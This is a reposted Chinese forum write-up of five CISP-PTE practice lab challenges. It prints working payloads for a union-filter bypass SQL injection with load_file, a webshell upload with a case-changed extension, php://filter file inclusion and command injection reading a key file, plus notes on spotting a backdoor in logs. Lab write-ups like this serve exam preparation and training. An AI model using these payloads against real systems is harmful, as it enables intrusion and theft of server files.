偶遇一次认证考试
2021-07-02 17:59:54 Author: forum.90sec.com(查看原文) 阅读量:118 收藏

起因

最近小迷弟想考个证书,问我cisp-pte证书怎么样,题目难不难。
竟然问到了我都知识盲区......

恶补知识

在网上疯狂搜索题目,你别说还真找到了。
打开一看还特么要收费,气的直哆嗦。
拒绝一切不合理收费

另寻他法

没办法了只能掏出我的神器

1

目标

第一题 sql注入

image003
image005

通过题目可知,就是利用注入读取/tmp/360/key

image011

经过测试过滤了union关键词(采用双写绕过)

image015

最终得到key

payload

x.x.x.x:81/vulnerabilities/fu1.php?id=-1') uniounionn select 1,2,load_file('/tmp/360/key'),4,5,6,7 +--+

第二题文件上传

image017
image019

这个题挺简单

直接上传图片马,修改后缀为cmd.phP(过滤了php)即可得到shell

image021
image023

第三题文件包含

image025
image027

一开始以为解题的思路在view.html,经过一番测试无果,后来发现是php伪协进行文件包含.

image029
image031

payload

x.x.x.x:83/vulnerabilities/fu1.php?file=php://filter/read=convert.b ase64-encode/resource=/var/www/html/key.php

第四题命令执行

image033

跟dvwa 那个靶机一样的

image037

payload

127.0.0.1| c'a't ../key.php
image039
image041

第五题日志分析

image045

有27M 这么大

用记事本打开直接崩溃了

image047

通过状态码可以过滤一部分

image049

继续搜索 admin

image053

发现可疑文件

admin/backdoor.php

image055

结束

经过这些,可以回答小迷弟的问题了


文章来源: https://forum.90sec.com/t/topic/1751/1
如有侵权请联系:admin#unsafe.sh